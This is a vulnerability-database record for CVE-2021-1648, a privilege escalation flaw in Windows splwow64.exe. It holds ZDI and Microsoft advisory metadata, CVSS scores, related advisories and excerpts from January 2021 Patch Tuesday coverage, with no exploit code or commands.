Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability

2021-05-03T00:00:00

Description

This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.

{"id": "ZDI-21-504", "vendorId": null, "type": "zdi", "bulletinFamily": "info", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "published": "2021-05-03T00:00:00", "modified": "2021-05-03T00:00:00", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "LOCAL", "authentication": "NONE", "availabilityImpact": "COMPLETE", "baseScore": 7.2, "confidentialityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0"}, "exploitabilityScore": 3.9, "impactScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "HIGH", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "baseScore": 7.8, "baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1"}, "exploitabilityScore": 1.8, "impactScore": 5.9}, "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-504/", "reporter": "Elliot Cao (@iamelli0t) working with Trend Micro's Zero Day Initiative", "references": ["https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-1648"], "cvelist": ["CVE-2021-1648"], "immutableFields": [], "lastseen": "2022-02-10T00:00:00", "viewCount": 30, "enchantments": {"dependencies": {"references": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "cve", "idList": ["CVE-2021-1648"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "kaspersky", "idList": ["KLA12045"]}, {"type": "krebs", "idList": ["KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1648"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JAN_4598229.NASL", "SMB_NT_MS21_JAN_4598230.NASL", "SMB_NT_MS21_JAN_4598231.NASL", "SMB_NT_MS21_JAN_4598242.NASL", "SMB_NT_MS21_JAN_4598243.NASL", "SMB_NT_MS21_JAN_4598245.NASL", "SMB_NT_MS21_JAN_4598275.NASL", "SMB_NT_MS21_JAN_4598278.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3"]}, {"type": "thn", "idList": ["THN:9CF96D7230D0DBA395C1DEDA718226AD"]}, {"type": "threatpost", "idList": ["THREATPOST:B879E243998561911585BBD37B7F33E9"]}, {"type": "zdi", "idList": ["ZDI-20-1432", "ZDI-20-1433", "ZDI-20-1434", "ZDI-21-020", "ZDI-21-022", "ZDI-21-024", "ZDI-21-078"]}], "rev": 4}, "score": {"value": 4.7, "vector": "NONE"}, "backreferences": {"references": [{"type": "attackerkb", "idList": ["AKB:0E829C08-804A-436D-A730-1B474A82E4A7"]}, {"type": "avleonov", "idList": ["AVLEONOV:13BED8E5AD26449401A37E1273217B9A"]}, {"type": "cve", "idList": ["CVE-2021-1648"]}, {"type": "googleprojectzero", "idList": ["GOOGLEPROJECTZERO:A596034F451F58030932B2FC46FB6F38"]}, {"type": "kaspersky", "idList": ["KLA12045"]}, {"type": "krebs", "idList": ["KREBS:B3F20C0C41C613971FDADBAE93382CDF"]}, {"type": "mscve", "idList": ["MS:CVE-2021-1648"]}, {"type": "nessus", "idList": ["SMB_NT_MS21_JAN_4598230.NASL", "SMB_NT_MS21_JAN_4598242.NASL", "SMB_NT_MS21_JAN_4598243.NASL", "SMB_NT_MS21_JAN_4598278.NASL"]}, {"type": "qualysblog", "idList": ["QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04"]}, {"type": "rapid7blog", "idList": ["RAPID7BLOG:A8AF62CC15B38126207722D29F080EE3"]}, {"type": "thn", "idList": ["THN:9CF96D7230D0DBA395C1DEDA718226AD"]}, {"type": "threatpost", "idList": ["THREATPOST:B879E243998561911585BBD37B7F33E9"]}, {"type": "zdi", "idList": ["ZDI-20-1432", "ZDI-20-1433", "ZDI-20-1434", "ZDI-21-020", "ZDI-21-022", "ZDI-21-024", "ZDI-21-078"]}]}, "exploitation": null, "epss": [{"cve": "CVE-2021-1648", "epss": "0.000520000", "percentile": "0.185370000", "modified": "2023-03-16"}], "vulnersScore": 4.7}, "_state": {"dependencies": 1647589307, "score": 1659749172, "epss": 1679070268}}

{"zdi": [{"lastseen": "2022-01-31T21:56:20", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-15T00:00:00", "type": "zdi", "title": "(0Day) Microsoft Windows splwow64 Untrusted Pointer Dereference Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2020-12-15T00:00:00", "id": "ZDI-20-1434", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1434/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:56:22", "description": "This vulnerability allows local attackers to disclose sensitive information on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this in conjunction with other vulnerabilities to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-08T00:00:00", "type": "zdi", "title": "(0Day) Microsoft Windows splwow64 Out-Of-Bounds Read Information Disclosure Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-08T00:00:00", "id": "ZDI-20-1433", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1433/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T21:56:22", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a write past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2020-12-15T00:00:00", "type": "zdi", "title": "(0Day) Microsoft Windows splwow64 Out-Of-Bounds Write Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2020-12-15T00:00:00", "id": "ZDI-20-1432", "href": "https://www.zerodayinitiative.com/advisories/ZDI-20-1432/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:29:12", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of a user-supplied value prior to dereferencing it as a pointer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Untrusted Pointer Dereference Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-06-29T00:00:00", "id": "ZDI-21-022", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-022/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:29:11", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-14T00:00:00", "id": "ZDI-21-024", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-024/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:29:16", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-14T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-14T00:00:00", "id": "ZDI-21-020", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-020/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:28:45", "description": "This vulnerability allows local attackers to escalate privileges on affected installations of Microsoft Windows. An attacker must first obtain the ability to execute low-privileged code on the target system in order to exploit this vulnerability. The specific flaw exists within the user-mode printer driver host process splwow64.exe. The issue results from the lack of proper validation of user-supplied data, which can result in a read past the end of an allocated buffer. An attacker can leverage this vulnerability to escalate privileges from low integrity and execute arbitrary code in the context of the current user at medium integrity.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "LOW", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "2021-01-21T00:00:00", "type": "zdi", "title": "Microsoft Windows splwow64 Out-Of-Bounds Read Privilege Escalation Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-21T00:00:00", "id": "ZDI-21-078", "href": "https://www.zerodayinitiative.com/advisories/ZDI-21-078/", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "mscve": [{"lastseen": "2023-03-17T02:34:50", "description": "Microsoft splwow64 Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T08:00:00", "type": "mscve", "title": "Microsoft splwow64 Elevation of Privilege Vulnerability", "bulletinFamily": "microsoft", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2021-01-12T08:00:00", "id": "MS:CVE-2021-1648", "href": "https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "cve": [{"lastseen": "2023-02-09T14:02:53", "description": "Microsoft splwow64 Elevation of Privilege Vulnerability", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-12T20:15:00", "type": "cve", "title": "CVE-2021-1648", "cwe": ["CWE-269"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 3.9, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.2, "vectorString": "AV:L/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1648"], "modified": "2022-07-21T13:43:00", "cpe": ["cpe:/o:microsoft:windows_10:2004", "cpe:/o:microsoft:windows_server_2012:-", "cpe:/o:microsoft:windows_10:1607", "cpe:/o:microsoft:windows_10:1809", "cpe:/o:microsoft:windows_server_2016:20h2", "cpe:/o:microsoft:windows_10:-", "cpe:/o:microsoft:windows_server_2016:1909", "cpe:/o:microsoft:windows_8.1:-", "cpe:/o:microsoft:windows_10:1909", "cpe:/o:microsoft:windows_server_2016:2004", "cpe:/o:microsoft:windows_10:20h2", "cpe:/o:microsoft:windows_server_2012:r2", "cpe:/o:microsoft:windows_server_2019:-", "cpe:/o:microsoft:windows_server_2016:-", "cpe:/o:microsoft:windows_10:1803"], "id": "CVE-2021-1648", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-1648", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:microsoft:windows_server_2016:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1803:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2019:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1809:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1607:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:1909:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:20h2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:r2:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_8.1:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2012:-:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_server_2016:2004:*:*:*:*:*:*:*", "cpe:2.3:o:microsoft:windows_10:-:*:*:*:*:*:*:*"]}], "qualysblog": [{"lastseen": "2021-01-15T00:26:33", "description": "This month\u2019s Microsoft Patch Tuesday addresses 83 vulnerabilities. The 10 Critical vulnerabilities cover Windows codecs, Office, HEVC video extensions, RPC runtime, and several other workstation vulnerabilities. Adobe released patches today for Photoshop, Campaign Classic, InCopy, Illustrator, Captivate, Bridge and Animate.\n\n### Workstation Patches\n\nOffice and Edge vulnerabilities should be prioritized for workstation-type devices, meaning any system that is used to access email or to access the internet via a browser. This includes multi-user servers that are used as remote desktops for users.\n\n### Microsoft Defender RCE Zero Day\n\nMicrosoft patches Defender Remote Code Execution vulnerability ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) in today's patch release for Microsoft Malware Protection Engine. Microsoft stated that this vulnerability was exploited before the patches were made available. This patch should be prioritized.\n\n### splwow64 Elevation of Privilege\n\nWhile Microsoft labeled this issue ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) as an elevation-of-privilege vulnerability, it can also be exploited to disclose information, specifically uninitialized memory. Microsoft stated the vulnerability has not been exploited in the wild, although details are available publicly.\n\n### Windows Kernel Local Elevation of Privilege\n\nMicrosoft updated [CVE-2020-17087](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2020-17087>) for Windows Server 2012 in today's Patch Tuesday, and users are recommended to apply today's patches for Windows Server 2012.\n\nWe appreciate Microsoft's acknowledgement of our co-ordinated disclosure of the underlying regression in the Windows Server 2012 version of this security update.\n\n### Adobe\n\nAdobe issued patches today covering multiple vulnerabilities in [Adobe Photoshop](<https://helpx.adobe.com/security/products/photoshop/apsb21-01.html>), [Illustrator](<https://helpx.adobe.com/security/products/photoshop/apsb21-02.html>), [Animate](<https://helpx.adobe.com/security/products/photoshop/apsb21-03.html>), [Campaign](<https://helpx.adobe.com/security/products/photoshop/apsb21-04.html>), [InCopy,](<https://helpx.adobe.com/security/products/photoshop/apsb21-05.html>) [Captivate](<https://helpx.adobe.com/security/products/photoshop/apsb21-06.html>) and [Bridge](<https://helpx.adobe.com/security/products/photoshop/apsb21-07.html>). The patches for Adobe Campaign are labeled as [Priority 2](<https://helpx.adobe.com/security/severity-ratings.html>), while the remaining patches are set to [Priority 3](<https://helpx.adobe.com/security/severity-ratings.html>).\n\nWhile none of the vulnerabilities disclosed in Adobe\u2019s release are known to be actively attacked today, all patches should be prioritized on systems with these products installed.\n\n### About Patch Tuesday\n\nPatch Tuesday QIDs are published at [Security Alerts](<https://www.qualys.com/research/security-alerts/>), typically late in the evening of [Patch Tuesday](<https://blog.qualys.com/tag/patch-tuesday>), followed shortly after by [PT dashboards](<https://qualys-secure.force.com/discussions/s/article/000006505>).", "cvss3": {}, "published": "2021-01-12T20:01:43", "type": "qualysblog", "title": "January 2021 Patch Tuesday \u2013 83 Vulnerabilities, 10 Critical, One Zero Day, Adobe", "bulletinFamily": "blog", "cvss2": {}, "cvelist": ["CVE-2020-17087", "CVE-2021-1647", "CVE-2021-1648"], "modified": "2021-01-12T20:01:43", "id": "QUALYSBLOG:84DFCF34CC23A9FDDFBD73DEF70C8C04", "href": "https://blog.qualys.com/category/vulnerabilities-research", "cvss": {"score": 7.2, "vector": "AV:L/AC:L/Au:N/C:C/I:C/A:C"}}], "thn": [{"lastseen": "2022-05-09T12:38:38", "description": "[![](https://thehackernews.com/images/-cZjUACk7bgA/X_5-UYTlv-I/AAAAAAAABec/V3IW_ZyIh9k3keOxtl2lI0PDNAaEMTRQACLcBGAsYHQ/s0/windows-update-download.jpg)](<https://thehackernews.com/images/-cZjUACk7bgA/X_5-UYTlv-I/AAAAAAAABec/V3IW_ZyIh9k3keOxtl2lI0PDNAaEMTRQACLcBGAsYHQ/s0/windows-update-download.jpg>)\n\nFor the first patch Tuesday of 2021, Microsoft released [security updates](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Jan>) addressing a total of 83 flaws spanning as many as 11 products and services, including an actively exploited zero-day vulnerability.\n\nThe latest security patches cover Microsoft Windows, Edge browser, ChakraCore, Office and Microsoft Office Services, and Web Apps, Visual Studio, Microsoft Malware Protection Engine, .NET Core, ASP .NET, and Azure. Of these 83 bugs, 10 are listed as Critical, and 73 are listed as Important in severity.\n\nThe most severe of the issues is a remote code execution (RCE) flaw in Microsoft Defender ([CVE-2021-1647](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1647>)) that could allow attackers to infect targeted systems with arbitrary code.\n\nMicrosoft Malware Protection Engine (mpengine.dll) provides the scanning, detection, and cleaning capabilities for Microsoft Defender antivirus and antispyware software. The last version of the software affected by the flaw is 1.1.17600.5, before it was addressed in version 1.1.17700.4.\n\nThe bug is also known to have been actively exploited in the wild, although details are scarce on how widespread the attacks are or how this is being exploited. It's also a zero-click flaw in that the vulnerable system can be exploited without any interaction from the user.\n\nMicrosoft said that despite active exploitation, the technique is not functional in all situations and that the exploit is still considered to be at a proof-of-concept level, with substantial modifications required for it to work effectively.\n\nWhat's more, the flaw may already be resolved as part of automatic updates to the Malware Protection Engine \u2014 which it typically releases once a month or as when required to safeguard against newly discovered threats \u2014 unless the systems are not connected to the Internet.\n\n\"For organizations that are configured for automatic updating, no actions should be required, but one of the first actions a threat actor or malware will try to attempt is to disrupt threat protection on a system so definition and engine updates are blocked,\" said Chris Goettl, senior director of product management and security at Ivanti.\n\nTuesday's patch also rectifies a privilege escalation flaw ([CVE-2021-1648](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1648>)) introduced by a previous patch in the GDI Print / Print Spooler API (\"splwow64.exe\") that was [disclosed by Google Project Zero](<https://thehackernews.com/2020/12/google-discloses-poorly-patched-now.html>) last month after Microsoft failed to rectify it within 90 days of responsible disclosure on September 24.\n\nOther vulnerabilities fixed by Microsoft include a memory corruption flaws in Microsoft Edge browser ([CVE-2021-1705](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1705>)), a Windows Remote Desktop Protocol Core Security feature bypass flaw ([CVE-2021-1674](<https://msrc.microsoft.com/update-guide/en-US/vulnerability/CVE-2021-1674>), CVSS score 